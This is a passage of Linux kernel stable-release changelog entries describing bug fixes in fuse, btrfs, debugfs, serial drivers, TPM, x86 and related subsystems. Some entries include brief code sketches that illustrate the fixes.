mechanism to remove the failed device from the system instead of
trying to recover from early PCI errors during device probe.
Signed-off-by: Guilherme G Piccoli <gpiccoli@linux.vnet.ibm.com>
Acked-by: Jacob Keller <jacob.e.keller@intel.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3ddf40e8c3 upstream.
Commit 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker
caused by replace_page_cache_page()") switched replace_page_cache() from
raw radix tree operations to page_cache_tree_insert() but didn't take
into account that the latter function, unlike the raw radix tree op,
handles mapping->nrpages. As a result, that counter is bumped for each
page replacement rather than balanced out even.
The mapping->nrpages counter is used to skip needless radix tree walks
when invalidating, truncating, syncing inodes without pages, as well as
statistics for userspace. Since the error is positive, we'll do more
page cache tree walks than necessary; we won't miss a necessary one.
And we'll report more buffer pages to userspace than there are. The
error is limited to fuse inodes.
Fixes: 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()")
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Miklos Szeredi <miklos@szeredi.hu>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a09f99edde upstream.
Fuse allowed VFS to set mode in setattr in order to clear suid/sgid on
chown and truncate, and (since writeback_cache) write. The problem with
this is that it'll potentially restore a stale mode.
The proper fix would be to let the filesystems do the suid/sgid clearing on
the relevant operations. Possibly some are already doing it, but there's no
way we can detect this.
So fix this by refreshing and recalculating the mode. Do this only if
ATTR_KILL_S[UG]ID is set to not destroy performance for writes. This is
still racy but the size of the window is reduced.
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e2b8828ff upstream.
Without "default_permissions" the userspace filesystem's lookup operation
needs to perform the check for search permission on the directory.
If the directory does not allow search for everyone (this is quite rare)
then the userspace filesystem has to set the entry timeout to zero to make
sure permission checks are always performed.
Changing the mode bits of the directory should also invalidate the
(previously cached) dentry to make sure the next lookup will have a chance
of updating the timeout, if needed.
Reported-by: Jean-Pierre André <jean-pierre.andre@wanadoo.fr>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cb3ae6d25a upstream.
Make sure userspace filesystem is returning a well formed list of xattr
names (zero or more nonzero length, null terminated strings).
[Michael Theall: only verify in the nonzero size case]
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0245eb76a upstream.
The original commit, which added support for the Armada CP110 system
controller, used global variables for storing all clock information. It
worked fine for the Armada 7k SoC, with a single CP110 block. After the
dual-CP110 Armada 8k was introduced, the data got overwritten and corrupted.
This patch fixes the issue by allocating resources dynamically in the
driver probe and storing them as platform drvdata.
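The shape of the fix, roughly (the private data structure name is an
assumption):
struct cp110_clk_data *data;

/* per-instance allocation instead of file-scope globals */
data = devm_kzalloc(&pdev->dev, sizeof(*data), GFP_KERNEL);
if (!data)
        return -ENOMEM;
platform_set_drvdata(pdev, data);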
Fixes: d3da3eaef7 ("clk: mvebu: new driver for Armada CP110 system ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Reviewed-by: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad715b268a upstream.
The Armada CP110 system controller comprises its own routine responsible
for registering gate clocks. Among others, the 'flags' field in
struct clk_init_data was not set and used random values, which
may cause unpredictable behavior. This patch fixes the problem by resetting
all fields of clk_init_data before assigning values for all gated clocks
of the Armada 7k/8k SoC family.
Fixes: d3da3eaef7 ("clk: mvebu: new driver for Armada CP110 system ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72f53af265 upstream.
There is a bug in the deferred ack code that causes a race with the
destroy of a QP.
A packet causes a deferred ack to be pended by putting the QP
into an rcd queue.
A return from the driver interrupt processing will process that rcd
queue of QPs and attempt to do a direct send of the ack. At this
point no locks are held and the above QP could now be put in the reset
state in the qp destroy logic. A refcount protects the QP while it
is in the rcd queue so it isn't going anywhere yet.
If the direct send fails to allocate a pio buffer,
hfi1_schedule_send() is called to trigger sending an ack from the
send engine. There is no state test in that code path.
The refcount is then dropped from the driver.c caller
potentially allowing the qp destroy to continue from its
refcount wait in parallel with the workqueue scheduling of the qp.
Reviewed-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e728ae271f upstream.
The device lock was unnecessarily obtained in the bus rescan work before
the amthif client search. That causes incorrect lock ordering and a task
hang:
...
[88004.613213] INFO: task kworker/1:14:21832 blocked for more than 120 seconds.
...
[88004.645934] Workqueue: events mei_cl_bus_rescan_work
...
The correct lock order is
cl_bus_lock
device_lock
me_clients_rwsem
Move the device_lock into the amthif init function, which is called
after me_clients_rwsem is released.
This fixes regression introduced by commit:
commit 025fb792ba ("mei: split amthif client init from end of clients enumeration")
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6675df311d upstream.
There are two separate issues that can lead to corrupted free space
trees.
1. The free space tree bitmaps had an endianness issue on big-endian
systems which is fixed by an earlier patch in this series.
2. btrfs-progs before v4.7.3 modified filesystems without updating the
free space tree.
To catch both of these issues at once, we need to force the free space
tree to be rebuilt. To do so, add a FREE_SPACE_TREE_VALID compat_ro bit.
If the bit isn't set, we know that it was either produced by a broken
big-endian kernel or may have been corrupted by btrfs-progs.
This also provides us with a way to add rudimentary read-write support
for the free space tree to btrfs-progs: it can just clear this bit and
have the kernel rebuild the free space tree.
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f8d468a15c upstream.
We moved the code for creating the free space tree the first time that
it's enabled, but didn't move the clearing code along with it. This
breaks my (undocumented) intention that `mount -o
clear_cache,space_cache=v2` would clear the free space tree and then
recreate it.
Fixes: 511711af91 ("btrfs: don't run delayed references while we are creating the free space tree")
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2fe1d55134 upstream.
In convert_free_space_to_{bitmaps,extents}(), we buffer the free space
bitmaps in memory and copy them directly to/from the extent buffers with
{read,write}_extent_buffer(). The extent buffer bitmap helpers use byte
granularity, which is equivalent to a little-endian bitmap. This means
that on big-endian systems, the in-memory bitmaps will be written to
disk byte-swapped. To fix this, use byte-granularity for the bitmaps in
memory.
Fixes: a5ed918285 ("Btrfs: implement the free space B-tree")
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ee6d1cb39 upstream.
Ben Greear reported:
> I see lots of instability as soon as I load up the carl9710 NIC.
> My application is going to be poking at it's debugfs files...
>
> BUG: KASAN: slab-out-of-bounds in carl9170_debugfs_read+0xd5/0x2a0
> [carl9170] at addr 0xffff8801bc1208b0
> Read of size 8 by task btserver/5888
> =======================================================================
> BUG kmalloc-256 (Tainted: G W ): kasan: bad access detected
> -----------------------------------------------------------------------
>
> INFO: Allocated in seq_open+0x50/0x100 age=2690 cpu=2 pid=772
>...
This breakage was caused by the introduction of intermediate
fops in debugfs by commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Thankfully, the original/real fops are still available in d_fsdata.
Reported-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9c4a45b17e upstream.
This patch fixes a crash that happens because b43legacy's
debugfs code expects file->f_op to be a pointer to its own
b43legacy_debugfs_fops struct. This is no longer the case
since commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51b275a6fe upstream.
This patch fixes a crash that happens because b43's
debugfs code expects file->f_op to be a pointer to
its own b43_debugfs_fops struct. This is no longer
the case since commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 86f0e06767 upstream.
This patch introduces an accessor which can be used
by the users of debugfs (drivers, fs, ...) to get the
original file_operations struct. It also removes the
REAL_FOPS_DEREF macro in file.c and converts the code
to use the public version.
Previously, REAL_FOPS_DEREF was only available within
the file.c of debugfs. But having a public getter
available for debugfs users is important as some
drivers (carl9170 and b43) use the pointer of the
original file_operations in conjunction with container_of()
within their debugfs implementations.
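Usage in such a driver then looks roughly like this (the wrapper struct and
its 'fops' member mirror what b43 does and are assumptions here):
const struct file_operations *real_fops = debugfs_real_fops(file);
struct b43_debugfs_fops *dfops =
        container_of(real_fops, struct b43_debugfs_fops, fops);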
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cd5d38b052 upstream.
Commit d9676fa152 ("ARCv2: Enable LOCKDEP") changed
local_save_flags() to not return the raw STATUS32 but a value encoded in
a form that could be fed directly to the CLRI/SETI instructions.
However, STATUS32.E[] was not captured correctly, as it corresponds to
bits [4:1] in the register and not [3:0].
Fixes: d9676fa152 ("ARCv2: Enable LOCKDEP")
Cc: Evgeny Voevodin <evgeny.voevodin@intel.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bc0c7ece61 upstream.
At the end of arc_init_IRQ the STATUS32.IE flag is going to be affected by
the "flag" instruction, but "flag" never touches the IE flag on ARCv2. So the
"kflag" instruction must be used instead of "flag".
Signed-off-by: Yuriy Kolerov <yuriy.kolerov@synopsys.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b3965767d8 upstream.
There are calls to serial8250_rpm_{get|put}() in __do_stop_tx_rs485() that are
certainly placed in a wrong location. I don't know how it had been tested with
runtime PM enabled, because it is an obvious "sleep in atomic context" error.
Besides that serial8250_rpm_get() is called immediately after an IO just
happened. It implies that the device is already powered on, see implementation
of serial8250_em485_rts_after_send() and serial8250_clear_fifos() for the
details.
No bug has been seen due to, as I can guess, the use of auto suspend mode,
where the scheduled transition to suspend is invoked much later than is needed
for a few writes to the port. It might be possible to trigger a warning if
stop_tx_timer fires when the device is suspended.
Refactor the code to use runtime PM only in case of timer function.
Fixes: 0c66940d58 ("tty/serial/8250: fix RS485 half-duplex RX")
Cc: "Matwey V. Kornilov" <matwey@sai.msu.ru>
Tested-by: Yegor Yefremov <yegorslists@googlemail.com>
Signed-off-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ae9fdefb6 upstream.
Since commit 18dfef9c7f ("serial: atmel: convert to irq handling
provided mctrl-gpio"), interrupts from GPIOs are not disabled any more
when the serial port is closed, leading to an oops when one of the
input pins is toggled (CTS/DSR/DCD/RNG).
This is only the case if those pins are used as GPIOs, i.e. declared
like that:
usart1: serial@f8020000 {
/* CTS and DTS will be handled by GPIO */
status = "okay";
rts-gpios = <&pioB 17 GPIO_ACTIVE_LOW>;
cts-gpios = <&pioB 16 GPIO_ACTIVE_LOW>;
dtr-gpios = <&pioB 14 GPIO_ACTIVE_LOW>;
dsr-gpios = <&pioC 31 GPIO_ACTIVE_LOW>;
rng-gpios = <&pioB 12 GPIO_ACTIVE_LOW>;
dcd-gpios = <&pioB 15 GPIO_ACTIVE_LOW>;
};
That's because modem interrupts used to be freed in atmel_shutdown().
After commit 18dfef9c7f ("serial: atmel: convert to irq handling
provided mctrl-gpio"), this code was just removed.
Calling atmel_disable_ms() disables the interrupts and everything works
fine again.
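A minimal sketch of the fix in the close path:
/* in atmel_shutdown(): stop modem-status (GPIO) interrupts again when
 * the port is closed */
atmel_disable_ms(port);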
Tested on at91sam9g35-cm
(This patch doesn't apply on -stable kernels, fixes for 4.4 and 4.7 will
be sent after this one is applied.)
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Fixes: 18dfef9c7f ("serial: atmel: convert to irq handling provided mctrl-gpio")
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4b75f80003 upstream.
The USR2_DCDIN bit is tested for in register usr1. As the name
suggests the usr2 register should be used instead. This fixes
reading the Carrier detect status.
Signed-off-by: Sascha Hauer <s.hauer@pengutronix.de>
Fixes: 90ebc48386 ("serial: imx: repair and complete handshaking")
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 19be0eaffa upstream.
This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db975 ("Fix
get_user_pages() race for write access") but that was then undone due to
problems on s390 by commit f33ea7f404 ("fix get_user_pages bug").
In the meantime, the s390 situation has long been fixed, and we can now
fix it by checking the pte_dirty() bit properly (and do it better). The
s390 dirty bit was implemented in abf09bed3c ("s390/mm: implement
software dirty bits") which made it into v3.9. Earlier kernels will
have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely
theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
we already did a COW" rather than play racy games with FOLL_WRITE that
is very fundamental, and then use the pte dirty flag to validate that
the FOLL_COW flag is still valid.
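The heart of the fix is a small helper along these lines (treat the exact form
as a sketch):
/*
 * FOLL_FORCE may write through unwritable ptes, but only after a COW has
 * actually happened; the pte_dirty() check is the proof that it did.
 */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
        return pte_write(pte) ||
               ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}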
Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
Acked-by: Hugh Dickins <hughd@google.com>
Reviewed-by: Michal Hocko <mhocko@suse.com>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Kees Cook <keescook@chromium.org>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: Willy Tarreau <w@1wt.eu>
Cc: Nick Piggin <npiggin@gmail.com>
Cc: Greg Thelen <gthelen@google.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 791cc43b36 upstream.
Commit 2a6fba6 "xfs: only return -errno or success from attr ->put_listent"
changes the return value of __xfs_xattr_put_listent to 0 in the case where
there is insufficient space in the buffer, assuming that setting
context->count to -1 would be enough, but all of the ->put_listent callers
only check seen_enough. This results in a failed assertion:
XFS: Assertion failed: context->count >= 0, file: fs/xfs/xfs_xattr.c, line: 175
in insufficient buffer size case.
This is only reproducible with at least 2 xattrs and only when the buffer
gets depleted before the last one.
Furthermore, if the buffer size is such that it is enough to hold the last
xattr's name, but not enough to hold the sum of the preceding xattr names,
listxattr won't fail with ERANGE, but will succeed, returning the last
xattr's name without the first character. The first character ends up
overwriting data stored at (context->alist - 1).
Signed-off-by: Artem Savkov <asavkov@redhat.com>
Reviewed-by: Dave Chinner <dchinner@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Cc: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d5644b7d8 upstream.
Runtime PM should be configured already once we call device_add. See
also the description in this mail thread
https://lists.linuxfoundation.org/pipermail/linux-pm/2009-November/023198.html
or the order of calls e.g. in usb_new_device.
The changed order also helps to avoid scenarios where runtime pm for
&shost->shost_gendev is activated whilst the parent is suspended,
resulting in error message "runtime PM trying to activate child device
hostx but parent yyy is not active".
In addition properly reverse the runtime pm calls in the error path.
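The resulting order in the host-add path, roughly (a sketch, error handling
elided):
/* runtime PM must be configured before the device becomes visible */
pm_runtime_set_active(&shost->shost_gendev);
pm_runtime_enable(&shost->shost_gendev);
device_enable_async_suspend(&shost->shost_gendev);

error = device_add(&shost->shost_gendev);
/* on failure, pm_runtime_disable()/pm_runtime_set_suspended() are
 * called in reverse order */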
Signed-off-by: Heiner Kallweit <hkallweit1@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd44aa9a25 upstream.
The rcar_fcp_enable() function immediately returns successfully when the
FCP device pointer is NULL to avoid forcing the users to check the FCP
device manually before every call. However, the stub version of the
function used when the FCP driver is disabled returns -ENOSYS
unconditionally, resulting in a different API contract for the two
versions of the function.
As a user that requires FCP support will fail at probe time when calling
rcar_fcp_get() if the FCP driver is disabled, the stub version of the
rcar_fcp_enable() function will only be called with a NULL FCP device.
We can thus return 0 unconditionally to align the behaviour with the
normal version of the function.
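The stub then mirrors the NULL-device behaviour of the real function (a sketch
of the disabled-driver variant):
static inline int rcar_fcp_enable(struct rcar_fcp_device *fcp)
{
        /* only reachable with fcp == NULL when the FCP driver is disabled,
         * so succeed just like the real function does for a NULL device */
        return 0;
}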
Reported-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72fd50e14e upstream.
The req_canceled() callback is used by tpm_transmit() periodically to
check whether the request has been canceled while it is receiving a
response from the TPM.
The TPM_CRB_CTRL_CANCEL register was cleared already in the crb_cancel
callback, which has two consequences:
* Cancel might not happen.
* req_canceled() always returns zero.
A better place to clear the register is when starting to send a new
command. The behavior of TPM_CRB_CTRL_CANCEL is described in the
section 5.5.3.6 of the PTP specification.
Fixes: 30fc8d138e ("tpm: TPM 2.0 CRB Interface")
Signed-off-by: Jarkko Sakkinen <jarkko.sakkinen@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d4816edfe7 upstream.
Unseal and load operations should be done as an atomic operation. This
commit introduces unlocked tpm_transmit() so that tpm2_unseal_trusted()
can do the locking by itself.
Fixes: 0fe5480303 ("keys, trusted: seal/unseal with TPM 2.0 chips")
Signed-off-by: Jarkko Sakkinen <jarkko.sakkinen@linux.intel.com>
Reviewed-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e71b9dff06 upstream.
Ima tries to call ->setxattr() on overlayfs dentry after having locked
underlying inode, which results in a deadlock.
Reported-by: Krisztian Litkey <kli@iki.fi>
Fixes: 4bacc9c923 ("overlayfs: Make f_path always point to the overlay and f_inode to the underlay")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Cc: Mimi Zohar <zohar@linux.vnet.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dcf5907e0e upstream.
The Qualcomm SPMI GPIO and MPP lines are problematic: they
are fetched from the main MFD driver with platform_get_irq(),
which means that at this point they will all be assigned the
flags set up for the interrupts in the device tree.
That is problematic since these are flagged as rising edge,
and at this point the interrupt descriptor is assigned a
rising edge, while the only thing the GPIO/MPP drivers really
do is issue irq_get_irqchip_state() on the line to read it
out and to provide a .to_irq() helper for *other* IRQ
consumers.
If another device tree node tries to flag the same IRQ
for use as something else than rising edge, the kernel
irqdomain core will protest like this:
type mismatch, failed to map hwirq-NN for <FOO>!
Which is what happens when the device tree defines two
contradictory flags for the same interrupt line.
To work around this and alleviate the problem, assign 0
as flag for the interrupts taken by the PM GPIO and MPP
drivers. This will lead to the flag being unset, and a
second consumer requesting rising, falling, both or level
interrupts will be respected. This is what the qcom-pm*.dtsi
files already do.
Switch to using the symbolic name IRQ_TYPE_NONE to make this
more readable.
This misconfiguration was caused by copy/pasting the
APQ8064 set-up; the latter has been fixed in a separate
patch.
Tested with one of the SPMI GPIOs: after this I can
successfully request one of these GPIOs as falling edge
from the device tree.
Fixes: 0840ea9e44 ("ARM: dts: add GPIO and MPP to MSM8660 PMIC")
Cc: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Cc: Stephen Boyd <sboyd@codeaurora.org>
Cc: Björn Andersson <bjorn.andersson@linaro.org>
Cc: Ivan T. Ivanov <ivan.ivanov@linaro.org>
Cc: John Stultz <john.stultz@linaro.org>
Cc: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca88696e8b upstream.
The Qualcomm PMIC GPIO and MPP lines are problematic: they
are fetched from the main MFD driver with platform_get_irq(),
which means that at this point they will all be assigned the
flags set up for the interrupts in the device tree.
That is problematic since these are flagged as rising edge,
and at this point the interrupt descriptor is assigned a
rising edge, while the only thing the GPIO/MPP drivers really
do is issue irq_get_irqchip_state() on the line to read it
out and to provide a .to_irq() helper for *other* IRQ
consumers.
If another device tree node tries to flag the same IRQ
for use as something else than rising edge, the kernel
irqdomain core will protest like this:
type mismatch, failed to map hwirq-NN for <FOO>!
Which is what happens when the device tree defines two
contradictory flags for the same interrupt line.
To work around this and alleviate the problem, assign 0
as flag for the interrupts taken by the PM GPIO and MPP
drivers. This will lead to the flag being unset, and a
second consumer requesting rising, falling, both or level
interrupts will be respected. This is what the qcom-pm*.dtsi
files already do.
Switch to using the symbolic name IRQ_TYPE_NONE to make this
more readable.
Fixes: bce3604696 ("ARM: dts: apq8064: add pm8921 mpp support")
Fixes: 874443fe9e ("ARM: dts: apq8064: Add pm8921 mfd and its gpio node")
Cc: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Cc: Stephen Boyd <sboyd@codeaurora.org>
Cc: Björn Andersson <bjorn.andersson@linaro.org>
Cc: Ivan T. Ivanov <ivan.ivanov@linaro.org>
Cc: John Stultz <john.stultz@linaro.org>
Cc: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fb833b1fbb upstream.
Commit 215e362daf ("ARM: 8306/1: loop_udelay: remove bogomips value
limitation") tried to increase the bogomips limitation, but in doing
so messed up udelay such that it always gives about a 5% error in the
delay, even if we use a timer.
The calculation is:
loops = UDELAY_MULT * us_delay * ticks_per_jiffy >> UDELAY_SHIFT
Originally, UDELAY_MULT was ((UL(2199023) * HZ) >> 11) and UDELAY_SHIFT
30. Assuming HZ=100, us_delay of 1000 and ticks_per_jiffy of 1660000
(eg, 166MHz timer, 1ms delay) this would calculate:
((UL(2199023) * HZ) >> 11) * 1000 * 1660000 >> 30
=> 165999
With the new values of 2047 * HZ + 483648 * HZ / 1000000 and 31, we get:
(2047 * HZ + 483648 * HZ / 1000000) * 1000 * 1660000 >> 31
=> 158269
which is incorrect. This is due to a typo - correcting it gives:
(2147 * HZ + 483648 * HZ / 1000000) * 1000 * 1660000 >> 31
=> 165999
In other words, the original value.
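The arithmetic above is easy to sanity-check with a few lines of standalone C;
HZ, the delay and the tick rate below are the example values from this text,
not values taken from any kernel header:
#include <stdio.h>

int main(void)
{
	const unsigned long long HZ = 100;
	const unsigned long long us = 1000;                  /* 1 ms delay */
	const unsigned long long ticks_per_jiffy = 1660000;  /* 166 MHz timer */
	unsigned long long old_mult = (2199023ULL * HZ) >> 11;           /* original */
	unsigned long long bad_mult = 2047 * HZ + 483648 * HZ / 1000000; /* typo */
	unsigned long long fix_mult = 2147 * HZ + 483648 * HZ / 1000000; /* corrected */

	printf("%llu\n", old_mult * us * ticks_per_jiffy >> 30); /* 165999 */
	printf("%llu\n", bad_mult * us * ticks_per_jiffy >> 31); /* 158269 */
	printf("%llu\n", fix_mult * us * ticks_per_jiffy >> 31); /* 165999 */
	return 0;
}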
Fixes: 215e362daf ("ARM: 8306/1: loop_udelay: remove bogomips value limitation")
Reviewed-by: Nicolas Pitre <nico@linaro.org>
Signed-off-by: Russell King <rmk+kernel@armlinux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72b4f6a5e9 upstream.
On x86_32, when an interrupt happens from kernel space, SS and SP aren't
pushed and the existing stack is used. So pt_regs is effectively two
words shorter, and the previous stack pointer is normally the memory
after the shortened pt_regs, aka '&regs->sp'.
But in the rare case where the interrupt hits right after the stack
pointer has been changed to point to an empty stack, like for example
when call_on_stack() is used, the address immediately after the
shortened pt_regs is no longer on the stack. In that case, instead of
'&regs->sp', the previous stack pointer should be retrieved from the
beginning of the current stack page.
kernel_stack_pointer() wants to do that, but it forgets to dereference
the pointer. So instead of returning a pointer to the previous stack,
it returns a pointer to the beginning of the current stack.
Note that it's probably outside of kernel_stack_pointer()'s scope to be
switching stacks at all. The x86_64 version of this function doesn't do
it, and it would be better for the caller to do it if necessary. But
that's a patch for another day. This just fixes the original intent.
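A hedged sketch of the shape of the fix (the function name and layout comments
are illustrative, this is not the verbatim arch/x86 code):
/* 'regs' lives near the top of the current stack page; the word at the
 * base of that page holds the previous stack pointer. */
static unsigned long previous_stack_pointer(struct pt_regs *regs)
{
	unsigned long *prev_esp =
		(unsigned long *)((unsigned long)regs & ~(THREAD_SIZE - 1));

	/* The bug returned (unsigned long)prev_esp, i.e. the address of
	 * the slot; the fix dereferences it to get the saved value. */
	return *prev_esp;
}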
Signed-off-by: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Andy Lutomirski <luto@amacapital.net>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Byungchul Park <byungchul.park@lge.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Nilay Vaish <nilayvaish@gmail.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Fixes: 0788aa6a23 ("x86: Prepare removal of previous_esp from i386 thread_info structure")
Link: http://lkml.kernel.org/r/472453d6e9f6a2d4ab16aaed4935f43117111566.1471535549.git.jpoimboe@redhat.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a51fe083e upstream.
When a CPU is physically added to a system then the MADT table is not
updated.
If subsequently a kdump kernel is started on that physically added CPU then
the ACPI enumeration fails to provide the information for this CPU which is
now the boot CPU of the kdump kernel.
As a consequence, generic_processor_info() is not invoked for that CPU so
the number of enumerated processors is 0 and none of the initializations,
including the logical package id management, are performed.
We have code which relies on the correctness of the logical package map and
other information which is initialized via generic_processor_info().
Executing such code will result in undefined behaviour or kernel crashes.
This problem applies only to the kdump kernel because a normal kexec will
switch to the original boot CPU, which is enumerated in MADT, before
jumping into the kexec kernel.
The boot code already has a check for num_processors equal 0 in
prefill_possible_map(). We can use that check as an indicator that the
enumeration of the boot CPU did not happen and invoke generic_processor_info()
for it. That initializes the relevant data for the boot CPU and therefore
prevents subsequent failure.
[ tglx: Refined the code and rewrote the changelog ]
Signed-off-by: Prarit Bhargava <prarit@redhat.com>
Fixes: 1f12e32f4c ("x86/topology: Create logical package id")
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Len Brown <len.brown@intel.com>
